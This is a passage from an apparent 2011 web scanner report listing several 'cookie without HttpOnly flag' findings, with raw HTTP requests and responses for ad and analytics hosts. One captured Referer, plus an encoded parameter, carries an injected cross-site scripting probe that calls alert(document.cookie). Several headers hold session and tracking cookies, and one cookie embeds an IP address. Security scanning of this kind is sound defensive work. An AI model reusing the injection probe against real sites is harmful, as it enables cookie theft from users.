GET /pressrelease.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hidglobal.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 18:44:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=q79e6v2ivtvk8fhlotecsnhgh4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.9. http://www.webcastir.com/SlideShowView.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.webcastir.com
Path:   /SlideShowView.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08 HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 14 Feb 2011 18:42:19 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCARTCQDA=IDPPADGAMEICOJEGLGGGNGCJ; path=/
Vary: Accept-Encoding
Set-Cookie: Coyote-2-426f6d68=426f6d2c:0; path=/
Content-Length: 2597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Slide 1</title>
<META name="ROBOTS" content="NOINDEX,NOFOLLOW">
<META HTTP-EQUIV="imagetoolbar" CONTENT="n
...[SNIP]...

11.10. http://ad.media6degrees.com/adserv/cs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12aob2xzt12707lxzt12707l; adh="1lf17qo16053t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv2aocm02219020805219; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=43511gvlggtq20000000g19020ojdlggtq20000000g19020yujlginvd0000000d19020x1blebnns1wj3q01411000e0flggrmr0000000h19020jv3lginvd0000000d19020yielginvd0000000d19020yiflginvd0000000d19020oj6lggtq20000000g19020e08lggtq20000000g190210qflginvq0000000c19020w3clebnns1wj3q01411000e0nlgevbm0000000j19020jv6lebnns1wj3q01411000jv5lggtq20000000g19020j4ilew2e20000001w19020khalggtq20000000g19021196lfzx0l0000001919021195lg7rdq0000001019020jillebnns1wj3q01411001194lg3y5y0000001619020z14lggtq20000000g19020zgdlggtq20000000g19020faalggtq20000000g19020z13lgio080000000719021193lgiiin0000000e19021192lg5l2h0000001519020jprlginvd0000000d19020w2klggtq20000000g19020yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001y19020mmnlebnns1wj3q01411000xwhlggtq20000000g19021004lginvd0000000d19020z02lggtq20000000g19020kbzlggtq20000000g19020kkclggtq20000000g19020eh5lf17qf0000001u19020z01lgmbyu00000002190206bylemlne0000002019020df5lgcqt50000000o1902111xlggtq20000000g19020mn2lginvd0000000d19020mn1lginvd0000000d19020swvlggtq20000000g1902100plggtq20000000g19020im3lgcqt50000000o19020yzflgmc0e0000000119010yzglginxj0000000a19020b6mlf17qk0000001t19020y63lg93og0000000t19020xvslebnns1wj3q01411000o5alggtq20000000g19020yyxlginvu0000000b19020yywlginzk0000000819020x1jlebnns1wj3q01411000xwclginvd0000000d19020o4plginvd0000000d19020yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000g19020yyelginyj0000000919020fullf8gij0000001q190210f6lg1nei00000018190200c9lfk1rn0000001n19020y7blg94wv0000000r19020jsalggtq20000000g190206pklginvd0000000d19020cajlfk1rn0000001n19020p7vlebnns1xgc001b120010tylg60ji00000011190210ellg1nei07gla00h120010eklggtq20000000g19020xuklebnns22191022190211k3lginvd0000000d190210telg60j600000013190210e9lg1nei0000001819020xtblggtq20000000g190210e2lggtq20000000g19020mivlgismk0000000619020yw4lggtq20000000g190210e4lginvd0000000d190210e5lg1nei0jfph015180010rdlg1vir087mk01719020xt3lggtq20000000g19020mzklgcsh70000000m19020agalggtq20000000g19020agblggtq20000000g19020mzqlgcsgy0000000n19020loxlginvd0000000d190207gmlebnns1wj3q01411000kfalginvd0000000d19020xthlebnns1xgc001b12000xtflggtq20000000g19020za2lginvd0000000d19020za1lginvd0000000d19020ovwlginvd0000000d190207gqlggtq20000000g19020lw4lginvd0000000d19020fuqlegh2b0000002119020lw3lggtq20000000g19020mz1lebnns1wj3q01411000l24lginvd0000000d19020l25lggtq20000000g190207vglfk1rn0tn5601n19020jk7lebnns1wj3q01411000cbnlfk1rn0tn5601n19020e11lggwth0000000f1902; sglst=21m0s8dtlggrmr01w8m00h1902080520h8kmlggrmr01w8m00h1902080520havtlggrmr0056q00h1902080520h82hlebnns1ucve00z10000600200avjlggrmr01w8m00h1902080520h3kilggrmr01w8m00h1902080520halhlggrmr01w8m00h1902080520h9bslggrmr01w8m00h1902080520hab4lebnns2707l0221902080521981zlggrmr0056q00h1902080520h8gxlggrmr0056q00h1902080520h81ylginvd0000000d1902080520d8gwlginvd0000000d1902080520daoklggrmr0056q00h1902080520haollginvd0000000d1902080520db07lggwth01r1w00f1902080520f8nclginvd0000000d1902080520d7inlginvd0000000d1902080520db05lggrmr01w8m00h1902080520hal1lggrmr01w8m00h1902080520h8wylginvd0000000d1902080520dbbhlggrmr01w8m00h1902080520h8wxlggrmr0056q00h1902080520hb0clfjpei0yygv01o1902080521972slggtq205iac00g1902080520gahhlginvd0000000d1902080520d8nblggrmr0056q00h1902080520hahilggrmr0056q00h1902080520h7gdlgcqt509l7900o1902080520ob08lfjpei0yygv01b1700070020040ulggrmr01w8m00h1902080520haprlggrmr01w8m00h1902080520h5l4lgcqt509l7900o1902080520oaanlebnns1xg0o00o120007002008aelggrmr0056q00h1902080520h474lgl4zd000000031902080320361hlggrmr01w8m00h1902080520h5b0lf17qo0000001s19020805219ag2leqh191vuz501z190208052193thlggrmr01w8m00h1902080520h8c9lggrmr0056q00h1902080520h9z4lggrmr01w8m00h1902080520hacjlggrmr01w8m00h1902080520hb1alfjpei0yygv01o190208052199mmlggrmr0056q00h1902080520hb0nlggrmr01w8m00h1902080520hb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00h1902080520h4zqlgl33700000005190208052059cblggrmr0056q00h1902080520h0tllegh2b25uy3021190208052195q8lebnns1ucve00k100006002004wmlggrmr01w8m00h1902080520h8bglginvd0000000d1902080520dacelggrmr01w8m00h1902080520h45mlfdxmc0000001p19020805219bhdlginvd0000000d1902080520d; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4lhh512012aob24qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122j0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r083ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4l2ch12012aocm4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16063w0s0103r01sZshBH2Om01l7sg3t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2arvc0231903080621a; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: rdrlst=4350ojdlggtq20000000h190311gvlggtq20000000h19030yujlginvd0000000e19030jv3lginvd0000000e19030e0flggrmr0000000i19030x1blebnns1wj3q01411000yielginvd0000000e19030yiflginvd0000000e19030oj6lggtq20000000h19030e08lggtq20000000h190310qflginvq0000000d19030e0nlgevbm0000000k19030w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000h19030j4ilew2e20000001x19030khalggtq20000000h19031196lfzx0l0000001a19031195lg7rdq0000001119030jillebnns1wj3q01411001194lg3y5y0000001719030z14lggtq20000000h19030zgdlggtq20000000h19030faalggtq20000000h19030z13lgio080000000819031193lgiiin0000000f19031192lg5l2h0000001619030jprlginvd0000000e19030w2klggtq20000000h19030yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001z19030mmnlebnns1wj3q01411000xwhlggtq20000000h19031004lginvd0000000e19030z02lggtq20000000h19030kbzlggtq20000000h19030z01lgmbyu0000000319030eh5lf17qf0000001v19030kkclggtq20000000h190306bylemlne0000002119030df5lgcqt50000000p1903111xlggtq20000000h19030mn2lginvd0000000e19030mn1lginvd0000000e19030swvlggtq20000000h1903100plggtq20000000h19030im3lgcqt50000000p19030yzflgmc0e0000000219020yzglginxj0000000b19030b6mlf17qk0000001u19030y63lg93og0000000u19030xvslebnns1wj3q01411000o5alggtq20000000h19030yyxlginvu0000000c19030yywlginzk0000000919030x1jlebnns1wj3q01411000xwclginvd0000000e19030o4plginvd0000000e19030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000h19030yyelginyj0000000a19030fullf8gij0000001r190310f6lg1nei00000019190300c9lfk1rn0000001o19030y7blg94wv0000000s19030jsalggtq20000000h190306pklginvd0000000e19030cajlfk1rn0000001o19030p7vlebnns1xgc001b120010tylg60ji00000012190310ellg1nei07gla00h120010eklggtq20000000h19030xuklebnns22191023190311k3lginvd0000000e190310telg60j600000014190310e9lg1nei0000001919030xtblggtq20000000h190310e2lggtq20000000h19030mivlgismk0000000719030yw4lggtq20000000h190310e4lginvd0000000e190310e5lg1nei0jfph015180010rdlg1vir087mk01819030xt3lggtq20000000h19030mzklgcsh70000000n19030agalggtq20000000h19030agblggtq20000000h19030mzqlgcsgy0000000o19030loxlginvd0000000e190307gmlebnns1wj3q01411000kfalginvd0000000e19030xthlebnns1xgc001b12000xtflggtq20000000h19030za2lginvd0000000e19030za1lginvd0000000e190307gqlggtq20000000h19030ovwlginvd0000000e19030lw4lginvd0000000e19030fuqlegh2b0000002219030lw3lggtq20000000h19030l24lginvd0000000e19030mz1lebnns1wj3q01411000l25lggtq20000000h190307vglfk1rn0tn5601o19030jk7lebnns1wj3q01411000cbnlfk1rn0tn5601o19030e11lggwth0000000g1903; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: sglst=21m0s8dtlggrmr01w8m00i1903080620i8kmlggrmr01w8m00i1903080620iavtlggrmr0056q00i1903080620i82hlebnns1ucve00z10000600200avjlggrmr01w8m00i1903080620i3kilggrmr01w8m00i1903080620ialhlggrmr01w8m00i1903080620i9bslggrmr01w8m00i1903080620iab4lebnns2707l0231903080621a81zlggrmr0056q00i1903080620i8gxlggrmr0056q00i1903080620i81ylginvd0000000e1903080620e8gwlginvd0000000e1903080620eaoklggrmr0056q00i1903080620iaollginvd0000000e1903080620eb07lggwth01r1w00g1903080620g7inlginvd0000000e1903080620e8nclginvd0000000e1903080620eb05lggrmr01w8m00i1903080620ial1lggrmr01w8m00i1903080620ibbhlggrmr01w8m00i1903080620i8wylginvd0000000e1903080620eb0clfjpei0yygv01p1903080621a8wxlggrmr0056q00i1903080620i72slggtq205lt200h1903080620hahhlginvd0000000e1903080620e8nblggrmr0056q00i1903080620iahilggrmr0056q00i1903080620i7gdlgcqt509opz00p1903080620pb08lfjpei0yygv01b1700070020040ulggrmr01w8m00i1903080620iaprlggrmr01w8m00i1903080620i5l4lgcqt509opz00p1903080620paanlebnns1xg0o00o120007002008aelggrmr0056q00i1903080620i474lgl4zd000000041903080420461hlggrmr01w8m00i1903080620i5b0lf17qo0000001t1903080621aag2leqh191vyhv0201903080621a3thlggrmr01w8m00i1903080620i8c9lggrmr0056q00i1903080620i9z4lggrmr01w8m00i1903080620iacjlggrmr01w8m00i1903080620ib1alfjpei0yygv01p1903080621a9mmlggrmr0056q00i1903080620ib0nlggrmr01w8m00i1903080620ib0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00i1903080620i4zqlgl33701cfx006190308062060tllegh2b25ygt0221903080621a9cblggrmr0056q00i1903080620i8bglginvd0000000e1903080620e4wmlggrmr01w8m00i1903080620i5q8lebnns1ucve00k10000600200acelggrmr01w8m00i1903080620i45mlfdxmc0000001q1903080621abhdlginvd0000000e1903080620e; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 19:01:52 GMT
Content-Length: 1037

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=1249
...[SNIP]...

11.11. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035753&rn=186743655&c7=http%3A%2F%2Fwww.securitynewsdaily.com%2F&c3=6035753&c4=http%3A%2F%2Fwww.securitynewsdaily.com%2F&c5=Technology%20-%20News&c8=Daily%20Security%20News%20Protecting%20Home%2C%20Internet%20%26%&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 14 Feb 2011 18:57:16 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 13-Feb-2013 18:57:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2100686&PluID=0&w=300&h=250&ord=5918453&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/o%3B234618958%3B0-0%3B0%3B53309666%3B4307-300/250%3B40072924/40090711/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; A3=gSboahoy0aSU00002gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdw07ZZ00001fFb9afAF02WG00001h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeahAp0c9M00003gYx+adw90cvM00001gKXNaepP0bdR00001afPqahnP09NH00001heXfagzX0c9M00001heXgahod0c9M00003h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhahnM0c9M00004heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjahoy0c9M00002hbwIaeVY09SF00002heXaaf9P0c9M00001gSdpafvK0aSU00001hAp8ahzF06OS00001heXbahoZ0c9M00001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=5p9W0000000001td8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t58fq70000000001t88qav000000000atd7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t68oiy0000000001te7FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fpT0000000002td8fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000007te8i430000000001t2852A0000000001sS8qay0000000002td87H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sun, 15-May-2011 13:57:17 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gSboahoy0aSU00002gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000SfFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeahAp0c9M00003heXfagzX0c9M00001afPqahnP09NH00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgahod0c9M00003heXhahnM0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjahoy0c9M00002gSdnafwN0aSU00003hbwIaeVY09SF00002hAp8ahzF06OS00001gSdpafvK0aSU00001heXaaf9P0c9M00001hbxBahE507aw00001heXbahoZ0c9M00001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t65p9W0000000001td89PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t480Te0000000001te82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav000000000atd8oiy0000000001te8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fpT0000000002td8fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t28qaw0000000007te8qay0000000002td8n7e0000000002tb87H10000000001td; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 18:57:17 GMT
Connection: close
Content-Length: 1872

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.13. http://hidglobal.122.2o7.net/b/ss/hidprod/1/H.21/s88918623856734  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hidglobal.122.2o7.net
Path:   /b/ss/hidprod/1/H.21/s88918623856734

Issue detail

